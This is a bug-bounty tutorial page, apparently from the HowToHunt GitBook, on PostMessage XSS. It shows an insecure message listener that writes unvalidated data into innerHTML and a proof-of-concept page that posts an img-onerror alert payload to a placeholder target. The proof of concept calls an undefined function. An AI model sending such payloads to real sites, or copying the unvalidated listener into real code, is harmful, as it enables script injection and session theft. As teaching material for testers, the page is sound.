🕵️
HowToHunt
  • HowToHunt.md
  • API Testing
    • Hidden API Functionality Exposure
    • Reverse Engineer an API
  • Account Takeover Methodology
    • Account Takeover Methodology
  • Application Level DoS
    • Application Level DoS Methods
  • Authentication Bypass
    • 2FA Bypasses
    • OTP Bypass
    • Account Ban Bypass
  • Broken-Link Hijacking
    • Broken-Link Hijacking
  • Broken Auth And Session Management
    • Session Based Bugs
  • CMS
    • AEM
    • Drupal
    • Wordpress
    • Moodle
  • CORS
    • CORS
    • CORS Bypasses
  • CSRF
    • CSRF
    • CSRF MindMap
    • CSRF Bypass
  • Finding CVEs
    • CVES
  • CheckList
    • Web Application Pentesting Checklist
    • Web Checklist by Chintan Gurjar.pdf
    • Web Checklist by Tushra Verma.pdf
    • Mindmap by Rohit Gautam
    • Mindmap by Cristian Cornea
  • Web Page Source Code Review
    • Web Page Code Review Tips
  • EXIF Geo Data Not Stripped
    • EXIF Geo Data Not Stripped
  • File Upload Bypass
    • File Upload Bypass
  • Find Origin IP
    • Find Origin
  • GraphQL
    • GraphQL
  • HTTP Desync Attack
    • HTTP_Desync
  • Host-Header Attack
    • Host-Header
  • HTML-Injection
    • HTML-Injection
  • IDOR
    • IDOR
  • JWT ATTACK
    • JWT
  • JIRA ATTACK
    • JIRA
  • MFA Bypass
    • MFA Bypasses
    • 2FA-Bypass
  • Misconfigurations
    • Default Credential And Admin Panel
    • Docker
    • S3 Bucket
  • OAuth
    • OAuth
    • OAuth Hunting
  • Open Redirection
    • Find OpenRedirect Trick
    • Open Redirection Bypass
  • Parameter Pollution
    • Parameter Pollution In Social Sharing Buttons
  • Password Reset Functionality
    • MindMap
    • Password Reset Token Leakage
    • Account_Takeover_By_Password_Reset_Functionality
    • Password_Reset_Flaws
  • Rate Limit
    • Rate Limit Flaws
    • Rate-Limit Bypass
    • No Rate-Limit on Verify-PhoneNo
    • No Rate-limit on Invite User
    • No Rate-limit on Promo
    • No Rate-limit on Verify-email
    • No Rate-limit on forget-password
  • Race Condition
    • Race Condition
  • Recon
    • Github
    • Recon Workflow
    • Subdomain Enumeration
  • SQLi
    • SQL Injection.md
  • SAML
    • SAML
  • SSRF
    • SSRF
    • Blind SSRF
  • SSTI
    • SSTI
  • Sign Up Functionality
    • Sign Up Bugs
    • Sign Up MindMap
  • Sensitive Info Leaks
    • Github Recon Method
    • Github-Dorks
    • Github Dorks All
    • Google Dorks
    • Shodan CVE Dorks
    • Version Leaks
  • Status Code Bypass
    • Status_Code_Bypass Tips
    • 403 Bypass
  • Subdomain Takeover
    • Subdomain Takeover - Detail Method
    • Subdomain Takeover - Easy Method
    • Subs or Top level Domain
  • Tabnabbing
    • Tabnabbing
  • WAF Bypasses
    • WAF Bypass Using Headers
  • Weak Password Policy
    • Weak Password Policy
  • XSS
    • XSS
    • Bypass CSP
    • XSS Bypass
    • Automated XSS
    • Post Message Xss
  • XXE
    • XXE Methods
    • Billion Laugh Attack
Powered by GitBook
On this page
  • Introduction
  • How PostMessage Works
  • Vulnerability: Improper Origin Validation
  • Example of an Insecure Implementation
  • Exploitation Scenario
  • Exploiting PostMessage XSS
  • Proof of Concept (PoC)
  • Breakdown of the Attack
  • Impact of PostMessage XSS
  1. XSS

Post Message Xss

Introduction

The postMessage API is widely used in modern web applications to enable cross-origin communication between different windows, iframes, and pop-ups. However, if the receiving application does not properly validate the origin of incoming messages, it may be vulnerable to PostMessage XSS.

This vulnerability allows attackers to send malicious data from an untrusted source (e.g., sandboxed iframe, null origin, or malicious website) to a trusted application, leading to security risks such as data theft, session hijacking, and arbitrary JavaScript execution.


How PostMessage Works

The window.postMessage() function allows scripts running in one window to send messages to another window. The syntax is:

window.postMessage(message, targetOrigin, [transfer]);
  • message: The data to be sent to the target window.

  • targetOrigin: A string specifying the expected origin of the recipient (use "*" to allow any origin, which is insecure).

  • transfer: Optional, used for passing objects.

Example of secure usage:

window.postMessage("data", "https://trusted-site.com");

Vulnerability: Improper Origin Validation

If an application listens for postMessage events without verifying the sender’s origin, an attacker can exploit this by crafting a malicious message from an unauthorized source.

Example of an Insecure Implementation

window.addEventListener("message", function (event) {
    // No origin validation
    document.body.innerHTML = event.data;
});

Security Issue:

  • The application directly processes any received message without verifying the sender's origin.

  • If an attacker sends a malicious payload (e.g., JavaScript injection), it can lead to XSS.

Exploitation Scenario

  1. The vulnerable website listens for messages using postMessage, but does not check the sender’s origin.

  2. An attacker hosts a malicious page and sends a crafted message to the vulnerable application.

  3. The malicious script gets executed inside the vulnerable website, leading to DOM-based XSS.


Exploiting PostMessage XSS

Proof of Concept (PoC)

The following PoC demonstrates how an attacker can inject malicious JavaScript into a vulnerable application by exploiting a poorly validated postMessage request.

<!doctype html>
<html>
<head>
    <meta charset="UTF-8" />
    <title>PostMessage XSS PoC</title>
    <script>
        function pocLink() {
            var ref = window.open('https://vulnerable-website.com'); // Open target
            ref.postMessage("<img src=x onerror=alert('XSS Exploited')>", "https://vulnerable-website.com");
        }
    </script>
</head>
<body>
    <a href="#" onclick="pocLink();">Click to Exploit</a>          
    <iframe src="https://vulnerable-website.com" onload="pocFrame(this.contentWindow)"></iframe>                    
</body>
</html>

Breakdown of the Attack

  • The script opens the target vulnerable website in a new window (window.open()).

  • It sends a malicious payload via postMessage() that contains an XSS injection.

  • If the application does not validate the message origin, the payload executes, triggering arbitrary JavaScript execution.


Impact of PostMessage XSS

An attacker exploiting this vulnerability can:

  • Execute malicious JavaScript on the vulnerable application.

  • Steal sensitive data such as session tokens, authentication credentials, or user inputs.

  • Modify page content or inject phishing links.

  • Bypass Same-Origin Policy (SOP) by controlling a trusted domain’s behavior.

  • Perform clickjacking attacks by embedding the site in an iframe.


PreviousAutomated XSSNextXXE Methods

Last updated 1 month ago

Enhanced and reformatted for HowToHunt repository by

remonsec